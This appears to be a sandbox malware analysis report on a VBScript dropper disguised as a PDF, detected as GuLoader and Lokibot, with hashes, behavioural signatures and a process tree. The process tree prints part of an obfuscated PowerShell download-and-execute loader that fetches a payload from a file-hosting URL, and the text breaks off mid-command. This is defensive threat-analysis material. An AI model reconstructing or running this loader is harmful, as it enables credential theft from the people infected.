Edit tour
Windows
Analysis Report
Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs
Overview
General Information
Sample name: | Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbsrenamed because original name is a hash value |
Original sample name: | Ajnlatkrs 09-30-2024pdf.vbs |
Analysis ID: | 1523162 |
MD5: | 34273527e12e172917598d0e29994432 |
SHA1: | d390fd4b4ffc45be0a7cf05765af19e402377640 |
SHA256: | 2c2a57b3a137d49c53bf35a36a7136a78d67fcaa16b8f352a6b46a457d691815 |
Tags: | Lokivbsuser-abuse_ch |
Infos: | |
Detection
GuLoader, Lokibot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 1988 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Aj#U0 0e1nlatk#U 00e9r#U00e 9s 09-30-2 024#U00b7p df.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7156 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Linnas Kandidtwr overskyet Ecdysial H jlandene P rovidentia lism Selek teringer # >;$Rystels es='Makere ss';<#plun gy Firdobl ing Prefer rers Aftvi ngende Enc oders Hard ier Forsva rscheferne s #>;$Hvsn ings=$host .PrivateDa ta;If ($Hv snings) {$ narrishkei t++;}funct ion atoman greb($Anti papistical 246){$Bond ske=$Fremm eligst+$An tipapistic al246.Leng th-$narris hkeit;for( $Halfhear tednesses= 5;$Halfhea rtednesses -lt $Bond ske;$Halfh eartedness es+=6){$mi nkfarven+= $Antipapis tical246[$ Halfhearte dnesses];} $minkfarve n;}functio n rme($Sti llehavsfla adernes){ . ($posthu me) ($Stil lehavsflaa dernes);}$ Gulvmaatte ns=atomang reb 'Spina Mb ugeoSad e zSkyldiD .rivlTsare lPartea He xi/ uror5A ngin. Prod 0A.tin Man om(skonnWm yoepibarse n MigodUna udo SulfwS nv.es Lati Kons NBaa n.TIniti K ldni1Regis 0Bolig.Kir op0Opsam; Civi AntyW Pub iVir, lnWid.w6Ra nce4 igna; alene A,ta bxReemk6Cr abb4Speci; Handl Iret trAl,miv B udg:midda1 Colpe2N db r1Bombe. H osl0Under) Ambit Sube lGRenteeU eldcValthk MeethoHype r/In,ho2 D une0 etnk1 List0 Med b0Nark 1Su bef0Alder1 onr Wicks FVaginiTwi .trB rguep hanefSci,s oEnga,xVan dl/Gstel1 umsk2 Feri 1Skaks.,in kl0 lge '; $librettoe ns=atomang reb ' alib U Tea,s Ci rceSui tRB egav- Geop a StorgInh omeIa.hinG arruTDisge ';$Broder ierne=atom angreb 'Di mplhAntiet DistitGast epB,nussKr ake:Ungdo/ Funkt/Over .d B llr S elviAfd,iv R vieeAfkr i.Drogsg R ekloBidrao Be,vegIn.m ulmarkseR, gnf.Figetc TuberoFaml dm tang/.a steuBev.dc P eud?Lamm ieWorkuxUd sk.pDunbao Tilm rReha nt P lm=Un uandCaddio Maskiwkine mnVbnenlDe lsao Sniva AtolldTegn i&AlumriSm gsdBendi= Paal1 Uri niIndtjs R ecrL A acU DrapezM.de rmSilenFda taiJLige 8 Su co9 Dob bm knusOTo fl5Contof Ornam9Inge nGLingul T omhoSko eu Zarisount, uL skdyyRe fluVCanon7 UdtmtqAdme tEMos itUn derw,avspr DividtFatt iRTransuPa lma ';$Udv iskning=at omangreb ' stose>Nedf r ';$posth ume=atoman greb 'Barg iiMarkoE S kibX oso ' ;$Cassina= 'Kendetegn er';$Denti ne='\Smaal ige.Eks';r me (atoman greb 'Raba t$Noncog T ap lNacroo enlsbE se gapsychlSt agn:AntisO oodvBo en e alkarFor becPsa ooG rundaM rce t Bire= Dy ,t$ .ispeM edionvatik v orev:Tr chaPredapB arfop Scle d FraiaMat ert eskaaV igil+Bes,a $Dem eDB r mae AndrnS eawat ooms iSpi.nnPro loeHa de ' );rme (ato mangreb ' Viva$Pedot gDisselT r mkoSairlb PretaFlig. lClogg: Kl asURemain Sregs uspe t Hoveu ag idSpa ei O p,eeReadod Perp.nSadd ueAnke s,o extsKommu= Te,te$Driv eB urmarT llgoKarned BioloeVrle srHeterino ns e,athir OleosnInpu te Succ.Il lu.s Phy p Swi.lFusi biSerpetEk str(A ous$ Anti,UUnde rdG udev,n diui mpros Unshak Opm anOrga iTr oopn J.ckg Farth)Staa